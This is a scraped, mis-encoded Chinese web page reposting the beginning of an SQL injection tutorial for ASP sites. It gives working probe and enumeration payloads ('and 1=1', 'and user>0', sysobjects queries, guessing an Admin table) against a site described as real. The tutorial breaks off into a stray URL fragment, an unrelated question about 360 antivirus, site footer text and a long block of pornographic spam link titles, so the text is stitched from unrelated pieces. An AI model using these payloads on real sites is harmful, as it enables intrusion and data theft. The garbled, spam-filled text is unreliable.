隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式編寫應(yīng)用程序的程序員也越來(lái)越多。但是由于這個(gè)行業(yè)的入門門檻不高,程序員的水平及經(jīng)驗(yàn)也參差不齊,相當(dāng)大一部分程序員在編寫代碼的時(shí)候,沒(méi)有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷,使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫(kù)查詢代碼,根據(jù)程序返回的結(jié)果,獲得某些他想得知的數(shù)據(jù),這就是所謂的SQL Injection,即SQL注入。

SQL注入是從正常的WWW端口訪問(wèn),而且表面看起來(lái)跟一般的Web頁(yè)面訪問(wèn)沒(méi)什么區(qū)別,所以目前市面的防火墻都不會(huì)對(duì)SQL注入發(fā)出警報(bào),如果管理員沒(méi)查看IIS日志的習(xí)慣,可能被入侵很長(zhǎng)時(shí)間都不會(huì)發(fā)覺(jué)。

但是,SQL注入的手法相當(dāng)靈活,在注入的時(shí)候會(huì)碰到很多意外的情況。能不能根據(jù)具體情況進(jìn)行分析,構(gòu)造巧妙的SQL語(yǔ)句,從而成功獲取想要的數(shù)據(jù),是高手與“菜鳥”的根本區(qū)別。

根據(jù)國(guó)情,國(guó)內(nèi)的網(wǎng)站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,我們從分入門、進(jìn)階至高級(jí)講解一下ASP注入的方法及技巧,PHP注入的文章由NB聯(lián)盟的另一位朋友zwell撰寫,希望對(duì)安全工作者和程序員都有用處。了解 ASP注入的朋友也請(qǐng)不要跳過(guò)入門篇,因?yàn)椴糠秩藢?duì)注入的基本判斷方法還存在誤區(qū)。大家準(zhǔn)備好了嗎?Let's Go...

入門篇

如果你以前沒(méi)試過(guò)SQL注入的話,那么第一步先把IE菜單=工具=Internet選項(xiàng)=高級(jí)=顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉。否則,不論服務(wù)器返回什么錯(cuò)誤,IE都只顯示為HTTP 500服務(wù)器錯(cuò)誤,不能獲得更多的提示信息。

第一節(jié)、SQL注入原理

以下我們從一個(gè)網(wǎng)站開始(注:本文發(fā)表前已征得該站站長(zhǎng)同意,大部分都是真實(shí)數(shù)據(jù))。

在網(wǎng)站首頁(yè)上,有名為“IE不能打開新窗口的多種解決方法”的鏈接,地址為:,我們?cè)谶@個(gè)地址后面加上單引號(hào)’,服務(wù)器會(huì)返回下面的錯(cuò)誤提示:

Microsoft JET Database Engine 錯(cuò)誤 '80040e14'

字符串的語(yǔ)法錯(cuò)誤 在查詢表達(dá)式 'ID=49'' 中。

/showdetail.asp,行8

從這個(gè)錯(cuò)誤提示我們能看出下面幾點(diǎn):

1. 網(wǎng)站使用的是Access數(shù)據(jù)庫(kù),通過(guò)JET引擎連接數(shù)據(jù)庫(kù),而不是通過(guò)ODBC。

2. 程序沒(méi)有判斷客戶端提交的數(shù)據(jù)是否符合程序要求。

3. 該SQL語(yǔ)句所查詢的表中有一名為ID的字段。

從上面的例子我們可以知道,SQL注入的原理,就是從客戶端提交特殊的代碼,從而收集程序及服務(wù)器的信息,從而獲取你想到得到的資料。

第二節(jié)、判斷能否進(jìn)行SQL注入

看完第一節(jié),有一些人會(huì)覺(jué)得:我也是經(jīng)常這樣測(cè)試能否注入的,這不是很簡(jiǎn)單嗎?

其實(shí),這并不是最好的方法,為什么呢?

首先,不一定每臺(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端,如果程序中加了cint(參數(shù))之類語(yǔ)句的話,SQL注入是不會(huì)成功的,但服務(wù)器同樣會(huì)報(bào)錯(cuò),具體提示信息為處理 URL 時(shí)服務(wù)器上出錯(cuò)。請(qǐng)和系統(tǒng)管理員聯(lián)絡(luò)。

其次,部分對(duì)SQL注入有一點(diǎn)了解的程序員,認(rèn)為只要把單引號(hào)過(guò)濾掉就安全了,這種情況不為少數(shù),如果你用單引號(hào)測(cè)試,是測(cè)不到注入點(diǎn)的

那么,什么樣的測(cè)試方法才是比較準(zhǔn)確呢?答案如下:

② ;and 1=1

③ ;and 1=2

這就是經(jīng)典的1=1、1=2測(cè)試法了,怎么判斷呢?看看上面三個(gè)網(wǎng)址返回的結(jié)果就知道了:

可以注入的表現(xiàn):

① 正常顯示(這是必然的,不然就是程序有錯(cuò)誤了)

② 正常顯示,內(nèi)容基本與①相同

③ 提示BOF或EOF(程序沒(méi)做任何判斷時(shí))、或提示找不到記錄(判斷了rs.eof時(shí))、或顯示內(nèi)容為空(程序加了on error resume next)

不可以注入就比較容易判斷了,①同樣正常顯示,②和③一般都會(huì)有程序定義的錯(cuò)誤提示,或提示類型轉(zhuǎn)換時(shí)出錯(cuò)。

當(dāng)然,這只是傳入?yún)?shù)是數(shù)字型的時(shí)候用的判斷方法,實(shí)際應(yīng)用的時(shí)候會(huì)有字符型和搜索型參數(shù),我將在中級(jí)篇的“SQL注入一般步驟”再做分析。

第三節(jié)、判斷數(shù)據(jù)庫(kù)類型及注入方法

不同的數(shù)據(jù)庫(kù)的函數(shù)、注入方法都是有差異的,所以在注入之前,我們還要判斷一下數(shù)據(jù)庫(kù)的類型。一般ASP最常搭配的數(shù)據(jù)庫(kù)是Access和SQLServer,網(wǎng)上超過(guò)99%的網(wǎng)站都是其中之一。

怎么讓程序告訴你它使用的什么數(shù)據(jù)庫(kù)呢?來(lái)看看:

SQLServer有一些系統(tǒng)變量,如果服務(wù)器IIS提示沒(méi)關(guān)閉,并且SQLServer返回錯(cuò)誤提示的話,那可以直接從出錯(cuò)信息獲取,方法如下:

;and user0

這句語(yǔ)句很簡(jiǎn)單,但卻包含了SQLServer特有注入方法的精髓,我自己也是在一次無(wú)意的測(cè)試中發(fā)現(xiàn)這種效率極高的猜解方法。讓我看來(lái)看看它的含義:首先,前面的語(yǔ)句是正常的,重點(diǎn)在and user0,我們知道,user是SQLServer的一個(gè)內(nèi)置變量,它的值是當(dāng)前連接的用戶名,類型為nvarchar。拿一個(gè) nvarchar的值跟int的數(shù)0比較,系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型,當(dāng)然,轉(zhuǎn)的過(guò)程中肯定會(huì)出錯(cuò),SQLServer的出錯(cuò)提示是:將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤,呵呵,abc正是變量user的值,這樣,不廢吹灰之力就拿到了數(shù)據(jù)庫(kù)的用戶名。在以后的篇幅里,大家會(huì)看到很多用這種方法的語(yǔ)句。

順便說(shuō)幾句,眾所周知,SQLServer的用戶sa是個(gè)等同Adminstrators權(quán)限的角色,拿到了sa權(quán)限,幾乎肯定可以拿到主機(jī)的 Administrator了。上面的方法可以很方便的測(cè)試出是否是用sa登錄,要注意的是:如果是sa登錄,提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生錯(cuò)誤,而不是”sa”。

如果服務(wù)器IIS不允許返回錯(cuò)誤提示,那怎么判斷數(shù)據(jù)庫(kù)類型呢?我們可以從Access和SQLServer和區(qū)別入手,Access和 SQLServer都有自己的系統(tǒng)表,比如存放數(shù)據(jù)庫(kù)中所有對(duì)象的表,Access是在系統(tǒng)表[msysobjects]中,但在Web環(huán)境下讀該表會(huì)提示“沒(méi)有權(quán)限”,SQLServer是在表[sysobjects]中,在Web環(huán)境下可正常讀取。

在確認(rèn)可以注入的情況下,使用下面的語(yǔ)句:

;and (select count(*) from sysobjects)0

;and (select count(*) from msysobjects)0

如果數(shù)據(jù)庫(kù)是SQLServer,那么第一個(gè)網(wǎng)址的頁(yè)面與原頁(yè)面 49是大致相同的;而第二個(gè)網(wǎng)址,由于找不到表msysobjects,會(huì)提示出錯(cuò),就算程序有容錯(cuò)處理,頁(yè)面也與原頁(yè)面完全不同。

如果數(shù)據(jù)庫(kù)用的是Access,那么情況就有所不同,第一個(gè)網(wǎng)址的頁(yè)面與原頁(yè)面完全不同;第二個(gè)網(wǎng)址,則視乎數(shù)據(jù)庫(kù)設(shè)置是否允許讀該系統(tǒng)表,一般來(lái)說(shuō)是不允許的,所以與原網(wǎng)址也是完全不同。大多數(shù)情況下,用第一個(gè)網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫(kù)類型,第二個(gè)網(wǎng)址只作為開啟IIS錯(cuò)誤提示時(shí)的驗(yàn)證。

進(jìn)階篇

在入門篇,我們學(xué)會(huì)了SQL注入的判斷方法,但真正要拿到網(wǎng)站的保密內(nèi)容,是遠(yuǎn)遠(yuǎn)不夠的。接下來(lái),我們就繼續(xù)學(xué)習(xí)如何從數(shù)據(jù)庫(kù)中獲取想要獲得的內(nèi)容,首先,我們先看看SQL注入的一般步驟:

第一節(jié)、SQL注入的一般步驟

首先,判斷環(huán)境,尋找注入點(diǎn),判斷數(shù)據(jù)庫(kù)類型,這在入門篇已經(jīng)講過(guò)了。

其次,根據(jù)注入?yún)?shù)類型,在腦海中重構(gòu)SQL語(yǔ)句的原貌,按參數(shù)類型主要分為下面三種:

(A) ID=49 這類注入的參數(shù)是數(shù)字型,SQL語(yǔ)句原貌大致如下:

Select * from 表名 where 字段=49

注入的參數(shù)為ID=49 And [查詢條件],即是生成語(yǔ)句:

Select * from 表名 where 字段=49 And [查詢條件]

(B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL語(yǔ)句原貌大致概如下:

Select * from 表名 where 字段=’連續(xù)劇’

注入的參數(shù)為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ,即是生成語(yǔ)句:

Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’

? 搜索時(shí)沒(méi)過(guò)濾參數(shù)的,如keyword=關(guān)鍵字,SQL語(yǔ)句原貌大致如下:

Select * from 表名 where 字段like ’%關(guān)鍵字%’

注入的參數(shù)為keyword=’ and [查詢條件] and ‘%25’=’, 即是生成語(yǔ)句:

Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’

接著,將查詢條件替換成SQL語(yǔ)句,猜解表名,例如:

ID=49 And (Select Count(*) from Admin)=0

如果頁(yè)面就與ID=49的相同,說(shuō)明附加條件成立,即表Admin存在,反之,即不存在(請(qǐng)牢記這種方法)。如此循環(huán),直至猜到表名為止。

表名猜出來(lái)后,將Count(*)替換成Count(字段名),用同樣的原理猜解字段名。

有人會(huì)說(shuō):這里有一些偶然的成分,如果表名起得很復(fù)雜沒(méi)規(guī)律的,那根本就沒(méi)得玩下去了。說(shuō)得很對(duì),這世界根本就不存在100%成功的黑客技術(shù),蒼蠅不叮無(wú)縫的蛋,無(wú)論多技術(shù)多高深的黑客,都是因?yàn)閯e人的程序?qū)懙貌粐?yán)密或使用者保密意識(shí)不夠,才有得下手。

;url=http%3A//www%2Ebitscn%2Ecom/windows/sql/20060413/898%2Ehtmlb=39a=17user=baidu

為啥裝了sqlserver,360檢查 出漏洞,然后修復(fù),再重啟卻不能上網(wǎng)?

根據(jù)我的經(jīng)驗(yàn),如果你打算使用數(shù)據(jù)庫(kù),那么機(jī)器上最好不要運(yùn)行360,因?yàn)樗?jīng)常莫名其妙就把數(shù)據(jù)庫(kù)服務(wù)停掉了


文章標(biāo)題:sqlserver漏洞,SQL注入漏洞產(chǎn)生的原因
轉(zhuǎn)載來(lái)于:http://www.xueling.net.cn/article/phshsg.html

其他資訊

在線咨詢
服務(wù)熱線
服務(wù)熱線:028-86922220
TOP
主站蜘蛛池模板: 山东中年夫妇大白天露脸自拍 | 96国产精品 | 高清精品| 亚洲在线日韩 | 人妻熟女一区二区AV | 五月丁香六月狠狠爱综合 | 高h视频在线播放 | 免费看国产一级特黄aaaa大片 | 999久久a精品合区久久久 | 91在线网站 | 亚洲中文字幕乱码一区二区三区 | 一区二区三区av | 午夜无遮挡男女啪啪免费软件 | YY111111少妇无码理论片 | 国产精品久一 | 91看片王 | 成人免费xyz网站 | a成人毛片 | 欧美日韩亚洲色图 | 日韩二级毛片 | 亚洲日韩中文在线精品第一 | 国产精品区视频中文字幕 | 中文字幕亚洲一区二区三区 | 精品久久久一 | 成年免费a级毛片免费看 | 国产精品亚洲专区无码影院 | 国产亚洲精品久久久久久动漫 | 一级片小视频 | 久久久久久亚洲av毛片大全 | 亚洲AV无码精品国产成人 | 亚洲综合图区 | 国产91清纯白嫩初高中在线观看 | 久久久精品人妻一区亚美研究所 | 久草www | 久久久久国产美女免费网站 | 斗破苍穹年番在线观看 | 18禁超污无遮挡无码免费应用 | 无遮挡在线 | 操人网址| 一区二区三区欧美日韩 | 白嫩人妻娇喘欲仙欲死 |